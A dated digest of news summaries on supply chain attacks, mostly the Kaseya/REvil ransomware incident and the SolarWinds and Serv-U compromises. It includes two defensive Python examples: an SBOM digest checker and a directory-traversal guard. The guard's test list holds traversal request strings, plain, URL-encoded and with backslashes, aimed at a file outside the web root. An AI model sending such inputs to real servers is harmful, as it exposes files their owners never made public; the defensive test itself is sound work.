Aaron Portnoy, the principal scientist at attack surface management specialists Randori, confesses to periodic bouts of imposter syndrome, despite having carved out a distinguished career in offensive security. According to him, the industry is witnessing dramatic changes, and there is a need for some change of approach for keeping pace with increasingly sophisticated attackers.

Ref - PortSwigger 

_______________________________________________________________________________________

(July 30, 2021)

Providers with robust cybersecurity programs also struggling with supply chain problems

According to a recent industry report, less than a quarter of hospitals, accountable care organizations (ACOs), and other healthcare providers demonstrated acceptable conformance with established framework standards. Provider organizations’ primary shortcoming in this area was their ability to validate whether their third-party suppliers and other partners are in line with their contractual security obligations.


_______________________________________________________________________________________

(July 30, 2021)

House committee approves K-12 cyber, DHS supply chain bills

The House Committee on Homeland Security approved two cybersecurity-focused bills – the K-12 Cybersecurity Act and the DHS Software Supply Chain Risk Management Act of 2021 – during a markup on July 28. The DHS Software Supply Chain Risk Management Act of 2021 aims to protect the Department of Homeland Security’s (DHS) networks from cyberattacks by modernizing how the Department procures information and communications technology or services (ICT(S)).

Ref - MeriTalk

_______________________________________________________________________________________

(July 29, 2021)

Ransomware exploits and supply chain attacks lead the cyber trends 2021

The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya. CPR also identified security flaws that would have allowed an attacker to get access to the Atlassian Jira bug system, with just one click, and get sensitive information, such as security issues on Atlassian cloud, Bitbucket, and on-premise products.

Ref - Check Point 

_______________________________________________________________________________________

(July 29, 2021)

Key recommendations to protect yourself from supply chain attacks

Before a decision to use a supplier is made, a full risk assessment is suggested if resources are available. You can meet the supplier's security manager or CISO, evaluate the supplier's IT resources, and ask suppliers how they prioritize risk. With this, you will get the ability to identify the risks associated with a particular supplier.


_______________________________________________________________________________________

(July 29, 2021)

Understanding the increase in supply chain security attacks

According to the new ENISA report - Threat Landscape for Supply Chain Attacks, which analyzed 24 recent attacks, strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss, and reputational damage.


_______________________________________________________________________________________

(July 29, 2021)

Supply chain security affects organizations everywhere

Supply chains offer cybercriminals a single point of failure and multiple attack paths to exploit. Often, attackers look for a smaller organization in the supply chain with fewer or laxer security measures as an entry point. From there they gain access to the entire network, and the ripple effect can mean catastrophic consequences.


_______________________________________________________________________________________

(July 29, 2021)

The big takeaway from the Kaseya supply chain/ransomware cyberattack

What everyone is learning after every new supply chain attack is that the battlefield on which organizations operate is considerably larger than previously imagined. The effectiveness of these supply chain shocks shows that our enterprises are also individual nodes of a much bigger macro-network. It’s a battlefield so large that drawing up a strategic defense using conventional tools and tactics won’t work.

 
_______________________________________________________________________________________

(July 28, 2021)

Cybersecurity in supply chain management - Key risks to consider

A cybersecurity strategy depends heavily on the steps a supply chain company's team takes. These four steps can help the company implement cybersecurity strategies to improve its supply chain risk management approach: fully understand the threat to the supply chain business, assess the cybersecurity measures, improve current measures, and treat cybersecurity as an ongoing process.


_______________________________________________________________________________________

(July 28, 2021)

Top officials urge Commerce Department to confront growing cybersecurity risks

U.S. Sens. Roger Wicker, R-Miss., and Maria Cantwell, D-Wash., ranking member and chair of the Senate Committee on Commerce, Science, and Transportation, sent a letter urging Department of Commerce (DOC) Secretary Gina Raimondo to implement and appropriately resource Congressional direction on growing the cybersecurity workforce. According to them, DOC should continue addressing cybersecurity supply chain risk, including by updating and, as appropriate, encouraging the adoption of software supply chain best practices.


_______________________________________________________________________________________

(July 28, 2021)

Where does the SME fit into a supply chain attack?

SMEs like MEDoc and Inbenta are frequently the target of supply chain attacks. Firstly, they are unlikely to have the security resources of the bigger companies they supply, so they are targeted as a stepping stone for larger attacks against bigger customers. But they are also targeted via their own supply chains. With supply chain attacks being a major growth area for cybercriminals, this is a worsening scenario.


_______________________________________________________________________________________

(July 27, 2021)

With software supply chain security, developers have a big role to play

Securing the software supply chain entails knowing exactly what components are being used in the software products, everything that impacts the code as it goes from development to production. This includes having visibility into even the code you didn't write, like open-source or third-party dependencies, or any other artifacts, and being able to prove their provenance.

Ref - Google

_______________________________________________________________________________________

(July 27, 2021)

Kaseya denies ransomware payment as it hails ‘100% effective’ decryption tool

Kaseya has denied rumors that it paid a ransom to the REvil cybercrime gang as it continues to roll out a decryptor to victims of a recent ransomware attack. The update sparked speculation as to the identity of the unnamed third party, with Allan Liska of Recorded Future’s CSIRT team positing a disgruntled REvil affiliate, the Russian government, or that Kaseya themselves had paid the ransom.

Ref - Portswigger 

_______________________________________________________________________________________

(July 27, 2021)

Protecting the supply chain from Kaseya-like attacks

To protect from Kaseya-like attacks, the end customer should have a solid understanding of its entire software bill of materials (SBOM) and have a regular dialog with its suppliers on current security posture and improvements. Dialog, not dictation, is important here. A component of understanding one’s supplier network is reducing it where possible.
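The two items above ("developers have a big role to play" and "Protecting the supply chain from Kaseya-like attacks") both come down to knowing every component in a release and being able to prove its provenance. The following is an added example, not code from Kaseya, Google, or any vendor on this page: it checks a constructed CycloneDX-style SBOM against a consumer's own allowlist of reviewed component digests (the purls, artifact bytes and allowlist are all constructed for the demonstration) and flags components that are unknown, lack a digest, or whose digest differs from the reviewed build.

```python
import hashlib
import json


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()


# Constructed artifact contents standing in for real package files, so the
# digests below are derived rather than typed in.
ARTIFACTS = {
    "pkg:pypi/libfoo@1.2.0": b"libfoo 1.2.0 reviewed build",
    "pkg:npm/leftpad@1.3.0": b"leftpad 1.3.0 reviewed build",
    "pkg:generic/unreviewed-tool@0.1": b"binary nobody has reviewed",
}

# The consumer's allowlist (assumed to be maintained by the consumer's own
# review process): purl -> SHA-256 of the build that was actually reviewed.
ALLOWLIST = {
    "pkg:pypi/libfoo@1.2.0": sha256_hex(ARTIFACTS["pkg:pypi/libfoo@1.2.0"]),
    "pkg:npm/leftpad@1.3.0": sha256_hex(ARTIFACTS["pkg:npm/leftpad@1.3.0"]),
    "pkg:pypi/requests@2.25.1": "0" * 64,  # placeholder digest, constructed
}

# Constructed SBOM fragment in CycloneDX JSON layout. Each component
# illustrates one outcome of the check.
CONSTRUCTED_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        # Matches the reviewed build exactly.
        {"purl": "pkg:pypi/libfoo@1.2.0",
         "hashes": [{"alg": "SHA-256",
                     "content": ALLOWLIST["pkg:pypi/libfoo@1.2.0"]}]},
        # Same purl, different bytes: the artifact changed after review.
        {"purl": "pkg:npm/leftpad@1.3.0",
         "hashes": [{"alg": "SHA-256",
                     "content": sha256_hex(b"leftpad 1.3.0 modified")}]},
        # Known component but no digest: provenance cannot be proven.
        {"purl": "pkg:pypi/requests@2.25.1"},
        # Never reviewed at all.
        {"purl": "pkg:generic/unreviewed-tool@0.1",
         "hashes": [{"alg": "SHA-256",
                     "content": sha256_hex(
                         ARTIFACTS["pkg:generic/unreviewed-tool@0.1"])}]},
    ],
})


def verify_sbom(sbom_json: str, allowlist: dict) -> dict:
    """Return {purl: status} for every component in the SBOM.

    Statuses: 'ok', 'digest-mismatch', 'no-digest', 'unknown-component'.
    Only SHA-256 is accepted as proof; other algorithms are ignored.
    """
    bom = json.loads(sbom_json)
    results = {}
    for comp in bom.get("components", []):
        purl = comp.get("purl") or f"{comp.get('name')}@{comp.get('version')}"
        digests = {h["alg"].upper(): h["content"].lower()
                   for h in comp.get("hashes", [])}
        if purl not in allowlist:
            results[purl] = "unknown-component"
        elif "SHA-256" not in digests:
            results[purl] = "no-digest"
        elif digests["SHA-256"] != allowlist[purl].lower():
            results[purl] = "digest-mismatch"
        else:
            results[purl] = "ok"
    return results


def release_is_known_good(results: dict) -> bool:
    """A release is known-good only when every component checks out."""
    return bool(results) and all(s == "ok" for s in results.values())


if __name__ == "__main__":
    outcome = verify_sbom(CONSTRUCTED_SBOM, ALLOWLIST)
    for purl, status in outcome.items():
        print(f"{status:18} {purl}")
    print("known-good release:", release_is_known_good(outcome))
```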

Ref - Medium

_______________________________________________________________________________________

(July 27, 2021)


How network segmentation can protect supply chains from ransomware attacks

Network segmentation has proven helpful in mitigating common ransomware attacks especially those arising from breached IoT devices, third-party vendors, and the like. Part of this has to do with the main benefits of network segmentation. It eliminates network congestion, resulting in overall improved performance, and improves intrusion control by making it easy to contain detected threats. Moreover, it minimizes access to specific sensitive data and information by zoning them to a more secure network.


_______________________________________________________________________________________

(July 26, 2021)


Why code signing best practices are vital to hardening security?

Code signing, and the process of establishing and ensuring trust, has become more critical alongside the growing reliance on software that users purchase from third-party vendors and build and deploy within their own organizations using everything from PowerShell and Bash scripts to containers, libraries, files, and executables.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 26, 2021)


When software updates get hacked

The attack against Kaseya — attributed to the Russia-linked REvil ransomware-as-a-service (RaaS) group — is part of a trend of cybercriminals and espionage operators targeting the suppliers of administrative software used by companies to manage their environments.

Ref - Dark Reading 

_______________________________________________________________________________________

(July 23, 2021)


Supply-chain threats and client-side vulnerabilities

The software supply chain attacks that target applications are growing in large part because the attack surface for these threats has exploded. And that is the result of the latest trends in app development. Evolving client-side app protection technologies are an important factor in reducing cyber risk.

Ref - Barracuda 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya Ransomware attack explained

REvil attacked Kaseya’s VSA SaaS platform using zero-day exploits to gain access and distribute malicious software to Kaseya’s customers and their systems. From there, the ransomware gang used weaknesses on those systems to encrypt everything. Since the malware was wrapped in the platform’s own update mechanism, it carried the signature of Kaseya’s platform. As a result, the malware got past everything on these clients’ systems.

Ref - PurpleSec

_______________________________________________________________________________________

(July 23, 2021)

The lessons to be learned from the Colonial Pipeline attack

The Colonial Pipeline attack – coupled with the backlash in the wake of both the SolarWinds and Codecov attacks – has led many to wonder if the executive order is enough. This unease has prompted top executives from firms like Microsoft, Amazon and Cisco to call for an international coalition to combat the global increase in ransomware.

Ref - TechRadar 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya gets master decryptor to help customers still suffering from REvil attack

Kaseya said it has obtained a decryptor that should successfully restore data encrypted during the Fourth of July weekend attack. Kaseya spokeswoman Dana Liedholm described the source of the decryptor as a trusted third party, declining to elaborate or comment on whether a ransom was paid.


_______________________________________________________________________________________

(July 23, 2021)

Getting ahead of supply-chain risks

Supply chains have become so global that this has created new risk in terms of the reliability and availability of certain things. To make sure that these supply chains are properly managed, it’s important to understand where the risk is, get ahead of it, and anticipate security needs and address them before they become problems.

Ref - McKinsey 

_______________________________________________________________________________________

(July 22, 2021)

Tracking the trail of software: The key to boosting security

There is an emerging set of best practices that Google and other software companies have developed in collaboration with the U.S. government to help deliver more secure software. The key is to be able to ensure a ‘certified and known’ good version of the software at any given time, down to the very smallest component code.

Ref - Forbes 

_______________________________________________________________________________________

(July 22, 2021)

DevSecOps: The key to securing supply chain in a multi-cloud threatscape

DevSecOps is all about leveraging your CI/CD platform and containers, increasing testing and scanning across the SDLC, and minimizing manual security measures with AI/ML. Businesses that employ a DevSecOps framework will not only bolster breach prevention, they will add business value as they deliver safer products and services that better protect their businesses and customers.

Ref - InfoQ

_______________________________________________________________________________________

(July 22, 2021)


Things that changed after the SolarWinds attack

One of the most significant impacts of the SolarWinds attack has been that cybersecurity is finally getting the attention it deserves at the highest levels of the U.S. government. It is spurring real changes in policy and actions among the public and private sectors. Organizations must take the lessons learned from this attack seriously and quickly move to improve resiliency and strengthen their own cybersecurity practices.

Ref - Trustwave 

_______________________________________________________________________________________

(July 22, 2021)

Who is responsible for improving security in the software development environment?

Venafi announced the findings of a global survey that evaluates the impact of software supply chain attacks like SolarWinds/SUNBURST, CodeCov, and Kaseya/REvil on how development organizations are changing their approach to securing software build and delivery environments.


_______________________________________________________________________________________

(July 21, 2021)


New bill would make some companies report cyberattacks to the government

A new bill unveiled Wednesday would make some companies tell the government when they’ve been hacked. The bipartisan Cyber Incident Notification Act is a response to the recent attacks on SolarWinds, which impacted government agencies, and Colonial Pipeline, which disrupted access to fuel across a large region of the country. Since then, ransomware attacks — where hackers encrypt files until a victim pays a ransom — have proliferated.

Ref - CNBC 

_______________________________________________________________________________________

(July 21, 2021)

Following SolarWinds & Colonial hacks, a new Bipartisan Cyber Reporting Bill introduced

A new bipartisan Cyber Incident Notification Act of 2021 would require federal government agencies, federal contractors, and critical infrastructure operators to notify the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) when a breach is detected. With this, the U.S. government can mobilize to protect critical industries across the country.

Ref - Senate.gov 

_______________________________________________________________________________________

(July 21, 2021)

A risk management cybersecurity imperative for State, Local & Tribal Governments

The cyber-attack using the SolarWinds vulnerability raised alarms throughout the federal government, as data on many agency networks was presumably compromised. The extent of the damage from SolarWinds (and other recent breaches) is still being investigated and mitigated. The cyber breach not only impacted federal systems, but also state, local, and Tribal governments (SLTG) and their databases.

Ref - Forbes 

_______________________________________________________________________________________

(July 20, 2021)

Why securing against IT supply chain attacks is crucial

Given the prevalence of the software being targeted in the supply chain attacks, it’s more about securing any company’s internal environment from supply chain attacks, rather than securing the supply chain itself. As attacks against these building blocks increasingly become a key part of threat actors’ playbook, taking proper steps to secure the enterprise’s IT supply chain is crucial to maintaining an effective cybersecurity program.

Ref - Medium 

_______________________________________________________________________________________

(July 20, 2021)

Top 5 things to know about supply chain attacks

There are 5 key things to know about supply chain attacks. They don’t attack the victim directly; they target its suppliers. They can affect almost any industry, including financial, energy, manufacturing, and transportation. They may or may not involve hardware or the internet. Attackers often try to compromise open source development or distribution to gain a foothold in companies. Moreover, there are several possible ways to safeguard against such threats.

Ref - TechRepublic 

_______________________________________________________________________________________

(July 19, 2021)


How to prevent supply chain attacks by securing DevOps

With threat actors focusing more intently on supply chain attacks, building security into the development process becomes mission-critical. Software developers need to embrace DevSecOps to prevent their applications from being used in a supply chain attack. They can do this by creating standards that ensure coding best practices, especially when third-party code is involved.


_______________________________________________________________________________________

(July 19, 2021)

Biden Administration blames hackers tied to China for Microsoft cyberattack spree

The Biden administration publicly blamed hackers affiliated with China’s main intelligence service for a far-reaching cyberattack on Microsoft Corp. email software this year, part of a global effort by dozens of nations to condemn Beijing’s malicious cyber activities. The U.S. government has high confidence that hackers tied to the Ministry of State Security, or MSS, carried out the unusually indiscriminate hack of Microsoft Exchange Server software that emerged in March, senior officials said.


_______________________________________________________________________________________

(July 19, 2021)

Breaking down the threat of going all-in with Microsoft security

Recent cyber events over the last several months have highlighted a critical need for enterprises to break free from depending on one vendor for security in order to limit risk. A ship with an unsegmented hull is prone to sinking very quickly when damaged. On the other hand, companies that segment their security infrastructure across multiple vendors are like ships with several compartments: when one area is compromised, the whole ship isn't immediately exposed.

Ref - Darkreading 

_______________________________________________________________________________________

(July 19, 2021)

Kaseya ransomware attack FAQ

According to Kaseya CEO Fred Voccola, less than 0.1% of the company's customers were embroiled in the breach -- but as their clientele includes MSPs, this means that smaller businesses have also been caught up in the incident. Present estimates suggest that 800 to 1500 small to medium-sized companies may have experienced a ransomware compromise through their MSP.

Ref - ZDNet 

_______________________________________________________________________________________

(July 18, 2021)

Password attacks on Microsoft highlight the need for Passwordless Zero Trust Systems

President Biden, the National Security Agency, and the Department of Defense have all made major public statements encouraging companies to move from traditional perimeter defense-based systems to Zero Trust systems. The policy is shifting for federal contractors such that Zero Trust is quickly becoming not just an option, but the regulation standard. Other industries must follow suit to protect their financial interests, intellectual property, and reputations.


_______________________________________________________________________________________

(July 17, 2021)

CloudFlare CDNJS bug could have led to widespread supply-chain attacks

Web infrastructure and website security company Cloudflare last month fixed a critical vulnerability in its CDNJS library that's used by 12.7% of all websites on the internet. The weakness concerned an issue in the CDNJS library update server that could potentially allow an attacker to execute arbitrary commands, leading to a complete compromise.


_______________________________________________________________________________________

(July 16, 2021)

Several security pros not confident about supply chain attack security - Report

According to a new report from machine identity management firm Venafi, many security pros aren't confident they could repel a major supply chain attack. Polling more than 1,000 information security professionals, developers, and executives in the IT and software development industries for the report, Venafi found that almost half (48%) believe security teams are responsible, with the same percentage saying their development teams are responsible.


_______________________________________________________________________________________

(July 16, 2021)

Kaseya attack - How to fight this unique attack technique

The Kaseya attack is different from the usual ransomware attacks. It started with a zero-day, and that's unusual. It's hard to name a best practice for avoiding this; moreover, the companies that were infected were following best practices. There were some mistakes, such as the platform being exposed to the internet when it shouldn't have been. It was mostly exposed so that people could work remotely because of the pandemic and to increase online availability. And it looks like there was an overuse of what are called endpoint protection exclusions.


_______________________________________________________________________________________

(July 15, 2021)

With software supply chain attacks escalating, who is responsible for increasing security

According to Venafi’s survey, respondents nearly unanimously agree (97%) that the techniques and procedures used to attack the SolarWinds software development environment will be reused in new attacks this year. Despite this certainty, there is no alignment between security and development teams on which team should be responsible for improving security in the software build and distribution environments.

Ref - Yahoo

_______________________________________________________________________________________

(July 15, 2021)

iOS zero-day let SolarWinds hackers compromise fully updated iPhones

The Russian state hackers who orchestrated the SolarWinds supply chain attack last year exploited an iOS zero-day as part of a separate malicious email campaign aimed at stealing Web authentication credentials from Western European governments. Attacks targeting CVE-2021-1879, as the zero-day is tracked, redirected users to domains that installed malicious payloads on fully updated iPhones.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 14, 2021)

Targeted attack activity heightens need for firms to patch new SolarWinds flaw

Organizations that have not yet patched against a critical remote code execution vulnerability disclosed this week in SolarWinds' Serv-U file transfer technology for Windows might want to do so quickly. Microsoft is presently tracking the attacker as DEV-0322. The group has used commercial VPN technologies and compromised consumer routers in previous attack activities.

Ref - Darkreading 

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers threat actor targeting SolarWinds software

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft

_______________________________________________________________________________________

(July 13, 2021)

Identity administration platform may be the weak link post-RMM supply-chain attack

Recent ransomware attacks that used a compromised Remote Monitoring and Management (RMM) platform to access endpoints and push malicious executables to them are forcing security teams to re-evaluate such centralized platforms with a very large blast radius. Such issues have again shown the need for organizations to move to infrastructure designed with Zero Trust principles in mind.

Ref - Medium

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers critical SolarWinds zero-day under active attack

An attacker can gain privileged access to exploited machines hosting Serv-U products and could then install programs; view, change or delete data; or run programs on the affected system. The vulnerability exists in the latest Serv-U version 15.2.3 HF1, released on May 5, and all prior versions.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 12, 2021)

SolarWinds patches critical Serv-U vulnerability exploited in the wild

SolarWinds is urging customers to patch a Serv-U remote code execution vulnerability exploited in the wild. According to SolarWinds, "if SSH is not enabled in the environment, the vulnerability does not exist." SolarWinds has addressed the security vulnerability reported by Microsoft with the release of Serv-U version 15.2.3 hotfix (HF) 2.


_______________________________________________________________________________________

(July 12, 2021)

SolarWinds confirms new zero-day flaw under attack

In a recent advisory, SolarWinds said a single threat actor exploited security flaws in its Serv-U Managed File Transfer and Serv-U Secure FTP products against a limited, targeted set of customers. This zero-day is new and completely unrelated to the SUNBURST supply chain attacks.

Ref - SecurityWeek 

_______________________________________________________________________________________

(July 11, 2021)

JustTech and its clients impacted in Kaseya supply-chain ransomware attack

JustTech disclosed that the company and its clients were victims of the recent cyber-attack that has been reportedly attributed to a criminal gang in Russia known as REvil. For JustTech, it is believed the cyber-attack began at 12:31 PM Eastern Standard Time on Friday, July 2nd. JustTech discovered the breach, disabled and shut down the affected servers within 8 minutes.

Ref - JustTech 

_______________________________________________________________________________________

(July 9, 2021)

Securing the supply chain: Lessons learned from the Codecov compromise

Rapid7 researchers provided the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins and Bamboo, and version control systems, such as GitHub and GitLab. Their guidance covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

Ref - Rapid7
 
_______________________________________________________________________________________

(July 9, 2021)

SolarWinds Serv-U remote memory escape vulnerability

SolarWinds was recently notified by Microsoft of a security vulnerability (CVE-2021-35211) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and has developed a hotfix to resolve it. Microsoft’s research indicates that exploitation of this vulnerability involves a limited, targeted set of customers and a single threat actor.

Ref - Solarwinds 

_______________________________________________________________________________________

(July 8, 2021)

Kaseya left its customer portal vulnerable to a 2015 flaw in its own software

On July 3, security incident response firm Mandiant notified Kaseya that their billing and customer support site — portal.kaseya.net — was vulnerable to CVE-2015-2862, a “directory traversal” vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser. As its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya’s customer portal was still exposed to the data-leaking weakness.
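The bug class named above, directory traversal, is what a web portal gets when it maps a request path onto the filesystem without checking where the resolved path ends up. The following is an added example and not Kaseya's code: a resolver that decodes the request, resolves it under a fixed document root, and rejects anything (encoded dots, backslashes, symlinks) that lands outside that root; the directory layout and file contents are constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class TraversalAttempt(ValueError):
    """Raised when a requested path would resolve outside the document root."""


def resolve_under_root(root, requested):
    """Map a request path onto a file under ``root`` or raise TraversalAttempt.

    The check is made on the fully resolved filesystem path rather than on
    the request string, so encoded dots, backslashes and symlinks are all
    caught by one comparison instead of a denylist of patterns.
    """
    root_path = Path(root).resolve()
    # Decode twice so double-encoded sequences such as %252e%252e are
    # compared in their final form.
    decoded = unquote(unquote(requested))
    # Windows web servers accept backslash as a separator; normalise it.
    decoded = decoded.replace("\\", "/")
    # A null byte never appears in a legitimate file name.
    if "\x00" in decoded:
        raise TraversalAttempt(requested)
    # Always treat the request as relative to the root, then resolve
    # '..' segments and symlinks to obtain the real target.
    candidate = (root_path / decoded.lstrip("/")).resolve()
    try:
        candidate.relative_to(root_path)
    except ValueError:
        raise TraversalAttempt(requested) from None
    return candidate


def read_public_file(root, requested):
    """Return the file's bytes, or None if it is outside root or missing."""
    try:
        target = resolve_under_root(root, requested)
    except TraversalAttempt:
        return None
    if not target.is_file():
        return None
    return target.read_bytes()


def build_demo_tree():
    """Create a constructed layout: a public root, a secret file outside it,
    and a symlink inside the root that points at the secret."""
    base = Path(tempfile.mkdtemp())
    root = base / "www"
    root.mkdir()
    (root / "index.html").write_bytes(b"<h1>portal</h1>")
    secret = base / "secret.txt"
    secret.write_bytes(b"db_password=constructed")
    try:
        os.symlink(secret, root / "link.txt")
    except OSError:
        pass  # symlinks may be disallowed; the other cases still run
    return root, secret


def demo():
    """Return {request: served?} for a set of constructed request paths."""
    root, _ = build_demo_tree()
    requests = [
        "index.html",               # plain request, served
        "/index.html",              # leading slash is relative to root
        "../secret.txt",            # classic traversal
        "%2e%2e/secret.txt",        # URL-encoded dots
        "%252e%252e/secret.txt",    # double-encoded dots
        "..\\secret.txt",           # backslash separator
        "link.txt",                 # symlink escaping the root
    ]
    return {r: read_public_file(root, r) is not None for r in requests}


if __name__ == "__main__":
    for req, served in demo().items():
        print(f"{req!r:26} -> {'served' if served else 'rejected'}")
```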


_______________________________________________________________________________________

(July 8, 2021)

FERC and NERC publish a whitepaper on SolarWinds and related supply chain compromise

On July 6, 2021, the staff of the FERC and the NERC E-ISAC issued a whitepaper entitled “SolarWinds and Related Supply Chain Compromise – Lessons for the North American Electricity Industry.” The whitepaper describes these major supply chain-related cybersecurity events and the key actions to take to secure systems.

Ref - JD Supra 

_______________________________________________________________________________________

(July 8, 2021)

NJCCIC recommendations on widespread supply chain ransomware attack

The NJCCIC recommends MSPs using VSA follow the guidance from Kaseya and disconnect VSA servers until notified by Kaseya that it is safe to connect them after an update is applied to remediate the exploited vulnerability. A tool to scan systems for signs of exploitation is available and the incident overview and technical details are also provided by Kaseya on their website.

Ref - NJCCIC 

_______________________________________________________________________________________

(July 8, 2021)

Analyzing Supply Chain Attacks

While software vulnerabilities still play a role in breaching organizations’ defenses, the software supply chain introduces an inordinate degree of new opportunities to introduce malicious artifacts and to execute unauthorized activities from within. It is important to note that malware is not a vulnerability, so it can neither be detected nor resolved using the same methods.

Ref - AquaSec 

_______________________________________________________________________________________

(July 8, 2021)

Global ransomware supply-chain attack takes a small Maryland town offline

Leonardtown, a town in Maryland, had been a victim of the massive ransomware attack that breached a popular software made by the information technology company Kaseya. The attack reached Leonardtown through its IT management company, JustTech, which uses the affected Kaseya product.


_______________________________________________________________________________________

(July 7, 2021)

REvil Ransomware Attack on Kaseya VSA - Detailed technical analysis

Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly. It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers and the team at DIVD.nl disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch.

Ref - Varonis 

_______________________________________________________________________________________

(July 7, 2021)

Analyzing the REvil Ransomware attack

In the recent attack on Kaseya, the ransomware was delivered via a malicious update payload sent out through the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server platform. Security researchers have identified three zero-day vulnerabilities potentially used in the attacks against Kaseya’s clients: an authentication bypass vulnerability, an arbitrary file upload vulnerability, and a code injection vulnerability.

Ref - Qualys 

_______________________________________________________________________________________

(July 7, 2021)

The massive Kaseya ransomware attack - Key things to know and learn

The attack on Kaseya points to a popular target for ransomware attackers: Managed Service Providers. MSPs such as Kaseya's customers allow companies to outsource certain software and services, such as IT management, to third parties, which can help avoid the cost of having to employ such experts in-house.

Ref - CNN 

_______________________________________________________________________________________

(July 7, 2021)

In the Kaseya supply chain ransomware attack, history repeats itself

Though details of the recent international ransomware campaign (via Kaseya) are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

Ref - CyberArk 

_______________________________________________________________________________________

(July 7, 2021)

Deconstructing the REvil Ransomware attack on Kaseya VSA

After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Administrative access to the compromised VSA servers was disabled, and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in those networks.


_______________________________________________________________________________________

(July 7, 2021)

Kaseya VSA ransomware attack, SolarWinds hack share many similarities

Last weekend’s Kaseya VSA supply chain ransomware attack and last year’s giant SolarWinds hack share a number of similarities. The attacks on Kaseya and SolarWinds share the most “sinister point” of compromise. That’s the trust between a vendor and a client. Key among the differences, however, is that the exploit of the Kaseya VSA product led to the injection of ransomware into the endpoints managed by Kaseya VSA on-premises users, while the SolarWinds attack led to data exfiltration.


_______________________________________________________________________________________

(July 7, 2021)

REvil ransomware gang’s major supply chain attack may affect over 1,500 customers

Although it was initially believed that only 50 companies using VSA on-premises were targeted by REvil, the evolving situation reveals more potential victims as numbers climb to the tune of 1,500-2,000 companies likely exposed to downstream impact by this major attack. The number of potential victims can be so much larger because Kaseya’s customers themselves are MSPs who serve a customer base of their own.


_______________________________________________________________________________________

(July 6, 2021)

The key lessons from Kaseya cyber attack

The solution to the Kaseya attack is more than detection and protection. It requires policy, regulations, law enforcement, diplomacy, criminal ecosystem disruption, and reducing the benefit of the crime.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers breached RNC via Synnex in a new attack

The Russian government hackers behind the SolarWinds campaign breached the computer systems of the Republican National Committee through Synnex in a new attack. There is no indication, however, that the RNC itself was hacked or that any RNC information was stolen.

Ref - CRN 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya ransomware: a software supply chain attack or not?

A vulnerability that had not yet been patched allowed the attackers to compromise on-premises Kaseya VSA servers and use them to launch the ransomware attack. And because so many of Kaseya's customers are MSPs, the attackers were able to push the ransomware downstream to as many as 1,500 small and medium-size businesses that outsource their everyday IT functions.

Ref - Sonatype 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya says it's seen no sign of a supply chain attack

Kaseya has said it has been unable to find signs that its code was maliciously modified, and offered users a ray of hope with the news that it is testing a patch for its on-premises software and considering restoring its SaaS services on Tuesday.


_______________________________________________________________________________________

(July 6, 2021)

How can a business ensure the security of its supply chain?

The reality is that supply chain attacks are not going away. In the first quarter of 2021, 137 organizations reported experiencing supply chain attacks at 27 different third-party vendors, while the number of supply chain attacks rose 42% from the previous quarter. Therefore, it becomes important for businesses to mitigate risk when it comes to the increased threat from supply chain attacks.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers still targeting Microsoft, focus on support staff

An investigation by the Microsoft Threat Intelligence Center detected information-stealing malware on a machine belonging to one of Microsoft's customer support agents, who had access to basic account information for a small number of Microsoft's customers. In some cases the actor used this information to launch highly targeted attacks as part of its broader campaign.


_______________________________________________________________________________________

(July 6, 2021)

Kaseya supply chain ransomware attack - Technical analysis

The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.

Ref - Zscaler
 
_______________________________________________________________________________________

(July 6, 2021)

Ransomware group connected to JBS incident thought to be behind massive MSP supply chain attack

While most Americans were preparing for the July 4 holiday weekend by picking up burgers and beers, the hackers thought to be responsible for the JBS ransomware incident were readying a supply chain attack timed to hit when IT workers were off duty. An attack on managed service providers (MSPs) making use of Kaseya products is thought to have compromised at least 200 of that company’s clients, and possibly as many as tens of thousands in total.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 5, 2021)

New supply chain ransomware attack targets

